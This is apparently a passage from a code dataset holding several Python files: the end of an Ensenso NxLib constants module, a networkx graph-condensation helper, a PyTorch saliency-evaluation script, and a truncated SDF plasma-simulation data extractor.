= \"LowBandwidth\"\nITM_MAC = \"MAC\"\nITM_MAC_ADDRESSES = \"MacAddresses\"\nITM_MAJOR = \"Major\"\nITM_MARK_FILTER_REGIONS = \"MarkFilterRegions\"\nITM_MARK_ONLY = \"MarkOnly\"\nITM_MASK = \"Mask\"\nITM_MASS = \"Mass\"\nITM_MASTER = \"Master\"\nITM_MATERIAL_BLUR = \"MaterialBlur\"\nITM_MAX = \"Max\"\nITM_MAX_EEPROM_FORMAT = \"MaxEepromFormat\"\nITM_MAX_FILE_SIZE = \"MaxFileSize\"\nITM_MAX_FLASH_TIME = \"MaxFlashTime\"\nITM_MAX_GAIN = \"MaxGain\"\nITM_MAX_POSE_ERROR = \"MaxPoseError\"\nITM_MAX_TOTAL_SIZE = \"MaxTotalSize\"\nITM_MAXIMUM_TRANSMISSION_UNIT = \"MaximumTransmissionUnit\"\nITM_MEASURE_CALIBRATION = \"MeasureCalibration\"\nITM_MEASURE_CONTRAST = \"MeasureContrast\"\nITM_MEASUREMENT_VOLUME = \"MeasurementVolume\"\nITM_MEDIAN_FILTER_RADIUS = \"MedianFilterRadius\"\nITM_MEMORY = \"Memory\"\nITM_MESSAGE = \"Message\"\nITM_MESSAGES = \"Messages\"\nITM_META_DATA = \"MetaData\"\nITM_META_INFO = \"MetaInfo\"\nITM_METHOD = \"Method\"\nITM_MIN = \"Min\"\nITM_MIN_DISPARITY = \"MinDisparity\"\nITM_MINIMUM_DISPARITY = \"MinimumDisparity\"\nITM_MINIMUM_VOLTAGE = \"MinimumVoltage\"\nITM_MINOR = \"Minor\"\nITM_MIRROR = \"Mirror\"\nITM_MODE = \"Mode\"\nITM_MODEL_NAME = \"ModelName\"\nITM_MODELS = \"Models\"\nITM_MONO_INTRINSIC = \"MonoIntrinsic\"\nITM_MONOCULAR = \"Monocular\"\nITM_MONOCULAR_CALIBRATION = \"MonocularCalibration\"\nITM_MONOCULAR_PATTERN_COUNT = \"MonocularPatternCount\"\nITM_MONTH = \"Month\"\nITM_MULTI_EXPOSURE_FACTOR = \"MultiExposureFactor\"\nITM_NAME = \"Name\"\nITM_NEAR = \"Near\"\nITM_NETWORK_ADAPTER = \"NetworkAdapter\"\nITM_NETWORK_ADAPTER_IP_ADDRESS = \"NetworkAdapterIpAddress\"\nITM_NETWORK_ADAPTER_IP_SUBNET_MASK = \"NetworkAdapterIpSubnetMask\"\nITM_NETWORK_TYPE = \"NetworkType\"\nITM_NODE = \"Node\"\nITM_NODES = \"Nodes\"\nITM_NOISE_LEVEL = \"NoiseLevel\"\nITM_NORMAL = \"Normal\"\nITM_NORMALS = \"Normals\"\nITM_NUMBER_OF_DISPARITIES = \"NumberOfDisparities\"\nITM_NUMBER_OF_IMAGE_SETS = \"NumberOfImageSets\"\nITM_NX_LIB = \"NxLib\"\nITM_OBJECT_POINTS = \"ObjectPoints\"\nITM_OBJECTS = \"Objects\"\nITM_OFFSET = \"Offset\"\nITM_OPEN = \"Open\"\nITM_OPEN_MP = \"OpenMP\"\nITM_OPERATING_SYSTEM = \"OperatingSystem\"\nITM_OPERATION = \"Operation\"\nITM_OPTICAL_AXIS = \"OpticalAxis\"\nITM_OPTIMIZATION_PROFILE = \"OptimizationProfile\"\nITM_OPTIONS = \"Options\"\nITM_OR = \"Or\"\nITM_OUTER_SIZE = \"OuterSize\"\nITM_OUTPUT = \"Output\"\nITM_OVERFLOW_POLICY = \"OverflowPolicy\"\nITM_OVERLAY = 
\"Overlay\"\nITM_OVERTEMPERATURE = \"Overtemperature\"\nITM_OVERWRITE_WITH_DYNAMIC = \"OverwriteWithDynamic\"\nITM_PACKETS_RESENT = \"PacketsResent\"\nITM_PADDING = \"Padding\"\nITM_PAIRED = \"Paired\"\nITM_PARAMETERS = \"Parameters\"\nITM_PATTERN = \"Pattern\"\nITM_PATTERN_BUFFER = \"PatternBuffer\"\nITM_PATTERN_COUNT = \"PatternCount\"\nITM_PATTERN_POSE = \"PatternPose\"\nITM_PATTERN_TYPE = \"PatternType\"\nITM_PATTERN_VOLUME = \"PatternVolume\"\nITM_PATTERNS = \"Patterns\"\nITM_PERSISTENT_OVERLAY = \"PersistentOverlay\"\nITM_PERSISTENT_PARAMETERS = \"PersistentParameters\"\nITM_PHASE_INTERPOLATION = \"PhaseInterpolation\"\nITM_PHYSICS = \"Physics\"\nITM_PIXEL_CLOCK = \"PixelClock\"\nITM_PIXEL_PITCH = \"PixelPitch\"\nITM_PIXEL_SIZE = \"PixelSize\"\nITM_PLANE = \"Plane\"\nITM_PLUGGED = \"Plugged\"\nITM_POINT_MAP = \"PointMap\"\nITM_POINTS = \"Points\"\nITM_POLARITY = \"Polarity\"\nITM_PORT = \"Port\"\nITM_POSE = \"Pose\"\nITM_POSE_ERROR = \"PoseError\"\nITM_POSES = \"Poses\"\nITM_POST_PROCESSING = \"PostProcessing\"\nITM_PRIMITIVE = \"Primitive\"\nITM_PROGRESS = \"Progress\"\nITM_PROGRESS_FACTOR = \"ProgressFactor\"\nITM_PROGRESS_GRID = \"ProgressGrid\"\nITM_PROGRESS_MASK = \"ProgressMask\"\nITM_PROGRESS_MASK_FACTOR = \"ProgressMaskFactor\"\nITM_PROGRESS_MODE = \"ProgressMode\"\nITM_PROJECTOR = \"Projector\"\nITM_PROJECTOR_DUTY_CYCLE = \"ProjectorDutyCycle\"\nITM_PROJECTOR_PATTERN = \"ProjectorPattern\"\nITM_PROJECTOR_POWER = \"ProjectorPower\"\nITM_PROPAGATION_DECAY = \"PropagationDecay\"\nITM_PROTECTION = \"Protection\"\nITM_RADIUS = \"Radius\"\nITM_RAW = \"Raw\"\nITM_RAW_AOI_INCREMENTS = \"RawAoiIncrements\"\nITM_RECALIBRATE = \"Recalibrate\"\nITM_RECTIFICATION = \"Rectification\"\nITM_RECTIFIED = \"Rectified\"\nITM_REDUCE = \"Reduce\"\nITM_REDUCED = \"Reduced\"\nITM_REFINEMENT = \"Refinement\"\nITM_REGION = \"Region\"\nITM_REGION_FILTER_DOWNSAMPLING = \"RegionFilterDownsampling\"\nITM_REGION_SIZE = \"RegionSize\"\nITM_RELATIVE = \"Relative\"\nITM_RELATIVE_AVERAGE_POSE_ERROR = \"RelativeAveragePoseError\"\nITM_RELATIVE_MAX_POSE_ERROR = \"RelativeMaxPoseError\"\nITM_REMOTE = \"Remote\"\nITM_RENDER_DEPTH_MAP = \"RenderDepthMap\"\nITM_RENDER_GROUND_TRUTH = \"RenderGroundTruth\"\nITM_RENDER_POINT_MAP = \"RenderPointMap\"\nITM_RENDER_POINT_MAP_TEXTURE = \"RenderPointMapTexture\"\nITM_RENDER_VIEW = \"RenderView\"\nITM_REPROJECTION = \"Reprojection\"\nITM_REPROJECTION_ERROR = \"ReprojectionError\"\nITM_REPROJECTION_ERROR_SCALE = \"ReprojectionErrorScale\"\nITM_RESET_CLOCK = \"ResetClock\"\nITM_RESIDUAL = \"Residual\"\nITM_RESTART_DAEMON = \"RestartDaemon\"\nITM_RESULT = \"Result\"\nITM_RETRIEVED = \"Retrieved\"\nITM_RETURN_ALL_PATTERN = \"ReturnAllPattern\"\nITM_REVERSE_PATH_FILTERING = \"ReversePathFiltering\"\nITM_RIGHT = \"Right\"\nITM_RIGHT_BOTTOM = \"RightBottom\"\nITM_RIGHT_TOP = \"RightTop\"\nITM_ROTATE = \"Rotate\"\nITM_ROTATION = \"Rotation\"\nITM_RUNNING = \"Running\"\nITM_RX = \"Rx\"\nITM_RY = \"Ry\"\nITM_SCALED_AREA_OF_INTEREST = \"ScaledAreaOfInterest\"\nITM_SCALED_MEASUREMENT_VOLUME = \"ScaledMeasurementVolume\"\nITM_SCALED_MINIMUM_DISPARITY = \"ScaledMinimumDisparity\"\nITM_SCALED_NUMBER_OF_DISPARITIES = \"ScaledNumberOfDisparities\"\nITM_SCALING = \"Scaling\"\nITM_SCORE = \"Score\"\nITM_SENSOR = \"Sensor\"\nITM_SENSORS = \"Sensors\"\nITM_SERIAL_NUMBER = \"SerialNumber\"\nITM_SETUP = \"Setup\"\nITM_SHADOWING_THRESHOLD = \"ShadowingThreshold\"\nITM_SHININESS = \"Shininess\"\nITM_SHOW_CAMERAS = \"ShowCameras\"\nITM_SHOW_GRID = \"ShowGrid\"\nITM_SHOW_OBJECT_POINTS = 
\"ShowObjectPoints\"\nITM_SHOW_PATTERN = \"ShowPattern\"\nITM_SHOW_PATTERN_POINTS = \"ShowPatternPoints\"\nITM_SHOW_PATTERNS = \"ShowPatterns\"\nITM_SHOW_RECTIFIED_AREA = \"ShowRectifiedArea\"\nITM_SHOW_SURFACE = \"ShowSurface\"\nITM_SHOW_USER_DEFINED_MODELS = \"ShowUserDefinedModels\"\nITM_SINK = \"Sink\"\nITM_SIZE = \"Size\"\nITM_SKEW = \"Skew\"\nITM_SOURCE = \"Source\"\nITM_SPECKLE_REMOVAL = \"SpeckleRemoval\"\nITM_SPECULAR = \"Specular\"\nITM_SPLIT_ROTATION = \"SplitRotation\"\nITM_START_DAEMON = \"StartDaemon\"\nITM_STATIC_BUFFER_COUNT = \"StaticBufferCount\"\nITM_STATIC_BUFFERS = \"StaticBuffers\"\nITM_STATUS = \"Status\"\nITM_STEREO = \"Stereo\"\nITM_STEREO_CALIBRATION = \"StereoCalibration\"\nITM_STEREO_CALIBRATION_ONLY = \"StereoCalibrationOnly\"\nITM_STEREO_EXTRINSIC = \"StereoExtrinsic\"\nITM_STEREO_INTRINSIC = \"StereoIntrinsic\"\nITM_STEREO_MATCHING = \"StereoMatching\"\nITM_STEREO_PATTERN_COUNT = \"StereoPatternCount\"\nITM_STOP_DAEMON = \"StopDaemon\"\nITM_SUBSAMPLING = \"Subsampling\"\nITM_SUBSET = \"Subset\"\nITM_SURFACE_CONNECTIVITY = \"SurfaceConnectivity\"\nITM_SYMBOL = \"Symbol\"\nITM_SYSTEM_INFO = \"SystemInfo\"\nITM_T1 = \"T1\"\nITM_T2 = \"T2\"\nITM_TARGET = \"Target\"\nITM_TARGET_BRIGHTNESS = \"TargetBrightness\"\nITM_TEMPERATURE = \"Temperature\"\nITM_TEMPORARY = \"Temporary\"\nITM_TEXT = \"Text\"\nITM_TEXTURE = \"Texture\"\nITM_THICKNESS = \"Thickness\"\nITM_THREADS = \"Threads\"\nITM_TILT_DIRECTION = \"TiltDirection\"\nITM_TIME = \"Time\"\nITM_TIME_EXECUTE = \"TimeExecute\"\nITM_TIME_FINALIZE = \"TimeFinalize\"\nITM_TIME_PREPARE = \"TimePrepare\"\nITM_TIMEOUT = \"Timeout\"\nITM_TIMESTAMP = \"Timestamp\"\nITM_TOLERANCE = \"Tolerance\"\nITM_TOP = \"Top\"\nITM_TRANSFORMATION = \"Transformation\"\nITM_TRANSFORMATIONS = \"Transformations\"\nITM_TRANSLATION = \"Translation\"\nITM_TRANSPORT_LAYER = \"TransportLayer\"\nITM_TRIGGER_DELAY = \"TriggerDelay\"\nITM_TRIGGER_MODE = \"TriggerMode\"\nITM_TRIGGERED = \"Triggered\"\nITM_TYPE = \"Type\"\nITM_U_EYE = \"UEye\"\nITM_USB = \"USB\"\nITM_UNIQUE_NAME = \"UniqueName\"\nITM_UNIQUENESS_OFFSET = \"UniquenessOffset\"\nITM_UNIQUENESS_RATIO = \"UniquenessRatio\"\nITM_UPDATE_GLOBAL_PATTERN_DATA = \"UpdateGlobalPatternData\"\nITM_UPDATER = \"Updater\"\nITM_URL = \"Url\"\nITM_USE_BUFFERED_PATTERNS = \"UseBufferedPatterns\"\nITM_USE_DISPARITY_MAP_AREA_OF_INTEREST = \"UseDisparityMapAreaOfInterest\"\nITM_USE_FLOAT16 = \"UseFloat16\"\nITM_USE_MODEL = \"UseModel\"\nITM_USE_OPEN_GL = \"UseOpenGL\"\nITM_USE_RECALIBRATOR = \"UseRecalibrator\"\nITM_USE_STEREO_TEXTURES = \"UseStereoTextures\"\nITM_USER = \"User\"\nITM_VALID_FIRMWARE = \"ValidFirmware\"\nITM_VALID_IP_ADDRESS = \"ValidIpAddress\"\nITM_VALID_REGION = \"ValidRegion\"\nITM_VALUE = \"Value\"\nITM_VALUES = \"Values\"\nITM_VERGENCE = \"Vergence\"\nITM_VERSION = \"Version\"\nITM_VERTICAL = \"Vertical\"\nITM_VIEW_POSE = \"ViewPose\"\nITM_VIGNETTING = \"Vignetting\"\nITM_WAIT_FOR = \"WaitFor\"\nITM_WAIT_FOR_PROJECTOR = \"WaitForProjector\"\nITM_WAIT_FOR_RECALIBRATION = \"WaitForRecalibration\"\nITM_WIDTH = \"Width\"\nITM_WIRING_TEST = \"WiringTest\"\nITM_WITH_OVERLAY = \"WithOverlay\"\nITM_WORLD_COORDINATES = \"WorldCoordinates\"\nITM_WRITE_FREQUENCY = \"WriteFrequency\"\nITM_YEAR = \"Year\"\nITM_YELLOW = \"Yellow\"\nITM_Z_BUFFER_ONLY = \"ZBufferOnly\"\nVAL_ADD = \"Add\"\nVAL_ALIGNED = \"Aligned\"\nVAL_ALIGNED_AND_DIAGONAL = \"AlignedAndDiagonal\"\nVAL_ALL = \"All\"\nVAL_ALLOW = \"Allow\"\nVAL_ARRAY = \"Array\"\nVAL_ASSEMBLY = \"Assembly\"\nVAL_AUTO = \"Auto\"\nVAL_AVAILABLE = 
\"Available\"\nVAL_AXIS = \"Axis\"\nVAL_BINARY = \"Binary\"\nVAL_BLOCK_MATCHING = \"BlockMatching\"\nVAL_BOOLEAN = \"Boolean\"\nVAL_BOTTOM = \"Bottom\"\nVAL_BOX = \"Box\"\nVAL_BUFFER = \"Buffer\"\nVAL_CONSOLE = \"Console\"\nVAL_CONTINUOUS = \"Continuous\"\nVAL_CORRELATION = \"Correlation\"\nVAL_CUBE = \"Cube\"\nVAL_CUBOID = \"Cuboid\"\nVAL_CYLINDER = \"Cylinder\"\nVAL_DHCP = \"DHCP\"\nVAL_DEBUG = \"Debug\"\nVAL_DEBUG_OUT = \"DebugOut\"\nVAL_DELAYED = \"Delayed\"\nVAL_DIAGONAL = \"Diagonal\"\nVAL_DISCARD_NEW = \"DiscardNew\"\nVAL_DISCARD_OLD = \"DiscardOld\"\nVAL_DOWN = \"Down\"\nVAL_ENSENSO = \"Ensenso\"\nVAL_ETHERNET = \"Ethernet\"\nVAL_EUCLIDEAN = \"Euclidean\"\nVAL_FALLING_EDGE = \"FallingEdge\"\nVAL_FILE = \"File\"\nVAL_FIXED = \"Fixed\"\nVAL_FLEX_VIEW2 = \"FlexView2\"\nVAL_FLEXIBLE = \"Flexible\"\nVAL_FLOAT = \"Float\"\nVAL_FORCE = \"Force\"\nVAL_GRID_HEIGHT = \"GridHeight\"\nVAL_GRID_SPACING = \"GridSpacing\"\nVAL_GRID_WIDTH = \"GridWidth\"\nVAL_HALCON = \"Halcon\"\nVAL_HAND = \"Hand\"\nVAL_HIDDEN = \"Hidden\"\nVAL_HIGH = \"High\"\nVAL_HIGH_ACTIVE = \"HighActive\"\nVAL_IMAGE_POSITION = \"ImagePosition\"\nVAL_IMMEDIATE = \"Immediate\"\nVAL_IN_USE = \"InUse\"\nVAL_INDEX = \"Index\"\nVAL_INFO = \"Info\"\nVAL_ITEM = \"Item\"\nVAL_LEFT = \"Left\"\nVAL_LEFT_TO_RIGHT = \"LeftToRight\"\nVAL_LINK = \"Link\"\nVAL_LINK_HIDDEN = \"LinkHidden\"\nVAL_LOCKED = \"Locked\"\nVAL_LOW = \"Low\"\nVAL_LOW_ACTIVE = \"LowActive\"\nVAL_MASK = \"Mask\"\nVAL_MONOCULAR = \"Monocular\"\nVAL_MOVING = \"Moving\"\nVAL_NETWORK_TYPE_A = \"NetworkTypeA\"\nVAL_NETWORK_TYPE_B = \"NetworkTypeB\"\nVAL_NETWORK_TYPE_C = \"NetworkTypeC\"\nVAL_NEW = \"New\"\nVAL_NONE = \"None\"\nVAL_NOT_SPECIFIED = \"NotSpecified\"\nVAL_NULL = \"Null\"\nVAL_NUMBER = \"Number\"\nVAL_OBJECT = \"Object\"\nVAL_OFF = \"Off\"\nVAL_OPEN = \"Open\"\nVAL_ORIGIN = \"Origin\"\nVAL_PWM = \"PWM\"\nVAL_PATTERN = \"Pattern\"\nVAL_PERSISTENT = \"Persistent\"\nVAL_PLANE = \"Plane\"\nVAL_PROJECTOR = \"Projector\"\nVAL_RANDOM = \"Random\"\nVAL_RAW = \"Raw\"\nVAL_RECTIFIED = \"Rectified\"\nVAL_REPROJECTION_ERROR = \"ReprojectionError\"\nVAL_RIGHT = \"Right\"\nVAL_RIGHT_TO_LEFT = \"RightToLeft\"\nVAL_RISING_EDGE = \"RisingEdge\"\nVAL_SERIAL_NUMBER = \"SerialNumber\"\nVAL_SGM_ALIGNED = \"SgmAligned\"\nVAL_SGM_ALIGNED_AND_DIAGONAL = \"SgmAlignedAndDiagonal\"\nVAL_SGM_DIAGONAL = \"SgmDiagonal\"\nVAL_SINGLE = \"Single\"\nVAL_SINGLE_CUSTOM = \"SingleCustom\"\nVAL_SOFTWARE = \"Software\"\nVAL_SPHERE = \"Sphere\"\nVAL_STANDARD = \"Standard\"\nVAL_STATIC = \"Static\"\nVAL_STEREO = \"Stereo\"\nVAL_STRING = \"String\"\nVAL_STRUCTURE_LOCKED = \"StructureLocked\"\nVAL_SUCCESSFUL = \"Successful\"\nVAL_T_PIECE = \"TPiece\"\nVAL_TILT_DIRECTION = \"TiltDirection\"\nVAL_TOP = \"Top\"\nVAL_TRACE = \"Trace\"\nVAL_TRIGGERED = \"Triggered\"\nVAL_TYPE = \"Type\"\nVAL_USB = \"USB\"\nVAL_UNKNOWN = \"Unknown\"\nVAL_UNTRIGGERED = \"Untriggered\"\nVAL_UP = \"Up\"\nVAL_VALIDATE = \"Validate\"\nVAL_VIRTUAL = \"Virtual\"\nVAL_WORKSPACE = \"Workspace\"\nVAL_X = \"X\"\nVAL_XYZ = \"XYZ\"\nVAL_Y = \"Y\"\nVAL_Z = \"Z\"\nVAL_ZYX = \"ZYX\"\n\nCONSTANTS_PREFIX = {'Commands': 'cmd', 'Errors': 'err', 'Items': 'itm',\n 'Values': 'val', 'ApiErrors': 'NxLib', 'ItemTypes': 'NxLib'}\n\nGET_CONSTANTS_CMD = \"GetConstants\"\n\n\ndef _update_constants_module():\n try:\n cmd = _NxLibCommand(GET_CONSTANTS_CMD)\n cmd.execute()\n result = cmd.result()\n\n itm = result.as_json()\n json_object = json.loads(itm)\n\n for constant_type in json_object:\n if (isinstance(json_object[constant_type], list)):\n prefix = 
CONSTANTS_PREFIX[constant_type]\n for constant in json_object[constant_type]:\n variable_name = None\n value = None\n if isinstance(constant, dict):\n variable_name = prefix + constant['Name']\n value = constant['Value']\n else:\n variable_name = prefix + constant\n value = str(constant)\n variable_name = _convert_camel_to_upper_snake(variable_name)\n if variable_name.startswith('NX_LIB'):\n variable_name = _fix_nxlib_prefix(variable_name)\n globals()[variable_name] = value\n except Exception:\n raise _NxLibError(\"Could not load current ensenso_nxlib constants. \"\n \"It may be that your ensenso_nxlib version does not support updating.\")\n\n\n# Updating is best-effort: on any failure we keep the static constants above.\ntry:\n _update_constants_module()\nexcept _NxLibError:\n pass\nexcept Exception:\n pass\n","sub_path":"ensenso_nxlib/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":25745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"508818709","text":"'''Copyright (c) 2014, The Regents of the University of Michigan\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n  list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n  this list of conditions and the following disclaimer in the documentation\n  and/or other materials provided with the distribution.\n\n* Neither the name of the copyright holder nor the names of its\n  contributors may be used to endorse or promote products derived from\n  this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n# this file contains one function that may be useful for distributed controller \n# design\n'''\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n# The function takes in a DiGraph and returns a pair: the first element is\n# the condensation DiGraph C, and the second is a dict mapping each node of\n# C to the subgraph of G it was condensed from\n
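# A quick worked example (hypothetical 4-node graph; the 2-cycle a<->b\n# collapses into a single SCC node):\n#   G = nx.DiGraph([('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'd')])\n#   C, subs = condensation_plus(G)\n#   C has 3 nodes; subs[C.graph['mapping']['a']] is the subgraph on {a, b}\n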
def condensation_plus(G):\n\tC = nx.condensation(G)\n\tmaps = C.graph['mapping']\n\n\tnum_of_c = C.number_of_nodes()\n\tnbunch = {}\n\tfor num in range(0,num_of_c):\n\t\tnbunch[num] = []\n\n\t#search through and divide G.nodes() into groups\n\tfor num in range(0,num_of_c):\n\t\tfor name in G.nodes():\n\t\t\tif maps[name]==num:\n\t\t\t\tnbunch[num].append(name)\n\n\tG_sub = {}\n\n\tfor i in range(0, num_of_c):\n\t\tG_sub[i] = G.subgraph(nbunch[i])\n\n\tresult = []\n\tresult.append(C)\n\tresult.append(G_sub)\n\n\treturn result\n\n","sub_path":"condensation_plus.py","file_name":"condensation_plus.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"538893389","text":"# from sklearn.metrics import precision_recall_fscore_support\nfrom network import Unet\nfrom dataset import DUTSdataset\nimport torch\nimport os\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom tensorboardX import SummaryWriter\n\nimport argparse\nfrom sklearn.metrics import precision_recall_curve\n\ntorch.set_printoptions(profile='full')\nif __name__ == '__main__':\n\n    models = sorted(os.listdir('models/state_dict/10151622'), key=lambda x: int(x.split('epo_')[1].split('step')[0]))\n    duts_dataset = DUTSdataset(root_dir='../DUTS-TE', train=False)\n    dataloader = DataLoader(duts_dataset, 8, shuffle=True)\n    beta_square = 0.3\n    device = torch.device(\"cuda\")\n    writer = SummaryWriter('log/F_Measure/10151622_adjusted')\n    model = Unet().to(device)\n    for model_name in models:\n        if int(model_name.split('epo_')[1].split('step')[0]) % 1000 != 0:\n            continue\n\n        state_dict = torch.load('models/state_dict/10151622/' + model_name)\n        model.load_state_dict(state_dict)\n        model.eval()\n        mae = 0\n        preds = []\n        masks = []\n        for i, batch in enumerate(dataloader):\n            img = batch['image'].to(device)\n            mask = batch['mask'].to(device)\n            with torch.no_grad():\n                pred, loss = model(img, mask)\n                pred = pred[5].data\n                mae += torch.mean(torch.abs(pred - mask))\n            pred = pred.requires_grad_(False)\n            preds.append(pred)\n            masks.append(mask)\n        pred = torch.cat(preds, 0)\n        mask = torch.cat(masks, 0)\n        writer.add_pr_curve('PR_curve', mask, pred, global_step=int(model_name.split('epo_')[1].split('step')[0]))\n        writer.add_scalar('MAE', torch.mean(torch.abs(pred - mask)), global_step=int(model_name.split('epo_')[1].split('step')[0]))\n        # Measure method from https://github.com/AceCoooool/DSS-pytorch solver.py\n        pred = pred.cpu()\n        mask = mask.round().float().cpu()\n        prec, recall = torch.zeros(256), 
torch.zeros(256)\n thlist = torch.linspace(0, 1 - 1e-10, 256)\n for i in range(256):\n y_temp = (pred >= thlist[i]).float()\n tp = (y_temp * mask).sum()\n # avoid prec becomes 0\n prec[i], recall[i] = (tp + 1e-10) / (y_temp.sum() + 1e-10), (tp + 1e-10) / (mask.sum() + 1e-10)\n f_score = (1 + beta_square) * prec * recall / (beta_square * prec + recall)\n print(torch.max(f_score))\n writer.add_scalar(\"Max F_score\", torch.max(f_score), global_step=int(model_name.split('epo_')[1].split('step')[0]))\n writer.add_scalar(\"Max_F_threshold\", thlist[torch.argmax(f_score)], global_step=int(model_name.split('epo_')[1].split('step')[0]))\n print(model_name.split('epo_')[1].split('step')[0])\n \"\"\"\n for edge in range(100):\n threshold = edge/100.0\n avg_precision, avg_recall, avg_fscore = [], [], []\n tp, tn, fp, fn, = 0, 0, 0, 0\n for i, batch in enumerate(dataloader):\n img = batch['image'].to(device)\n mask = batch['mask'].to(device)\n with torch.no_grad():\n pred, loss = model(img, mask)\n pred = pred[5].data\n writer.add_pr_curve('1234', mask, pred)\n mae += F.mse_loss(pred, mask)\n pred = pred.requires_grad_(False)\n pred = torch.round(pred + threshold - 0.5).data\n t = mask.type(torch.cuda.FloatTensor)\n p = pred.type(torch.cuda.FloatTensor)\n f = 1 - mask.type(torch.cuda.FloatTensor)\n n = 1 - pred.type(torch.cuda.FloatTensor)\n # based on http://blog.acronym.co.kr/556\n tp += float(torch.sum(t * p))\n tn += float(torch.sum(f * n))\n fp += float(torch.sum(f * p))\n fn += float(torch.sum(t * n))\n if i % 100 == 0 and i > 0:\n print('Model: '+model_name)\n print('i: ', i)\n print('tp: '+str(tp))\n print('tn: '+str(tn))\n print('fp: '+str(fp))\n print('fn: '+str(fn))\n break\n precision = tp / (tp + fp)\n recall = tp / (tp + fn)\n fscore = (1 + beta_square) * precision * recall / (beta_square * precision + recall)\n writer.add_scalar('precision', precision, global_step=int(model_name.split('epo_')[1].split('step')[0]))\n writer.add_scalar('recall', recall, global_step=int(model_name.split('epo_')[1].split('step')[0]))\n writer.add_scalar('F_score', fscore, global_step=int(model_name.split('epo_')[1].split('step')[0]))\n print('Model : ' + model_name)\n print('Threshold : '+str(threshold))\n print('Precision : ' + str(precision))\n print('Recall : ' + str(recall))\n print('F_score : ' + str(fscore))\n print('MAE:' + str(mae / 10000))\n writer.add_scalar('MAE', mae / 10000, global_step=int(model_name.split('epo_')[1].split('step')[0]))\n \"\"\"","sub_path":"pytorch/measure_test.py","file_name":"measure_test.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"97223434","text":"# -- coding: utf-8 --\nimport sys\nimport multiprocessing\nfrom multiprocessing import shared_memory\nimport constant as const\nfrom matplotlib import colors, ticker, cm\nfrom numpy import ma\nimport time\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport sdf\nimport matplotlib\nimport math\nmatplotlib.use('agg')\n\nsavedir = const.txtdir # \"./txt/a0_1_2e-2/\"\nsavename = \"XtMatr.npy\"\nfftdir = const.figdir # \"./fig/a0_1_2e-2/\"\n###\ndirsdf = const.sdfdir # '../Data/a0_1_2e-2/'\ndirsize = const.filenumber # 4\n\ndelta_x = const.delta_x\ndelta_y = const.delta_y\nx_interval = 10\ny_interval = 1\nfor i in range(10000):\n if i * delta_x < 1e-6:\n x_interval = i\n if i * delta_y < 1e-6:\n y_interval = i\nprint(x_interval,y_interval)\n\n\nxStartDistance = 1000 #sys.argv[2]\nxStart = 
int(float(xStartDistance)/const.delta_x/x_interval)\nxEnd = int(max((xStart + const.Nx/x_interval) , const.stop/x_interval))\nXarr = const.delta_x * x_interval * np.arange(xStart,xEnd+2)\nprint('Xarr.shape',Xarr.shape)\nprint('start end',xStart , xEnd)\ndef extract(n):\n #### header data ####\n print('n:'+str(n))\n # xt = np.frombuffer(global_arr_shared, np.double).reshape(SHAPE)\n xt = np.ndarray(ss1, dtype=ss2, buffer=shm.buf) # xt[X,T,Y]\n data = sdf.read(dirsdf+str(n).zfill(dirsize)+\".sdf\", dict=True)\n header = data['Header']\n time = header['time']\n # E_y0=data['Electric Field/Ey'].data[:,int(y)]\n #E = data['Electric Field/Ey'].data[:,::int(y_interval)]\n E = data['Magnetic Field/Bz'].data[:,::int(y_interval)]\n if n < start_move_number:\n for x in range(xStart,xEnd+1):\n a=int(x*x_interval)\n d_n=int((1e15*delta_x*a/c)/dt)\n if n-d_n > 0 and n-d_n < t_size :# [fs]\n xt[x-xStart,n-d_n,:]=E[a-1,:] #/bxunit \n else:\n # for x in range(1,int(xgrid/x_interval)+1):\n for x in range(xStart,xEnd+1):\n a=int(x*x_interval)\n if a-c*(time-window_start_time)/delta_x >= 0 and a-c*(time-window_start_time)/delta_x < gridnumber-1:\n # [fs]\n d_n=int((1e15*delta_x*a/c)/dt)\n xt[x-xStart,n-d_n,:]=E[int(round(a-c*(time-window_start_time)/delta_x)),:] #/bxunit\n return \"OK\"+str(n)\n # else:bz.append(0)\n # print 'Reading finished%d' %len(t)\nif __name__ == \"__main__\":\n ######## Constant defined here ########\n pi = 3.1415926535897932384626\n q0 = 1.602176565e-19 # C\n m0 = 9.10938291e-31 # kg\n v0 = 2.99792458e8 # m/s^2\n kb = 1.3806488e-23 # J/K\n mu0 = 4.0e-7*pi # N/A^2\n epsilon0 = 8.8541878176203899e-12 # F/m\n h_planck = 6.62606957e-34 # J s\n # lamada\n\n\n wavelength= const.lamada #10.6e-6\n\n ####\n\n frequency = v0*2*pi/wavelength\n micron = 1e-6\n c = 3e8\n exunit = m0*v0*frequency/q0\n bxunit 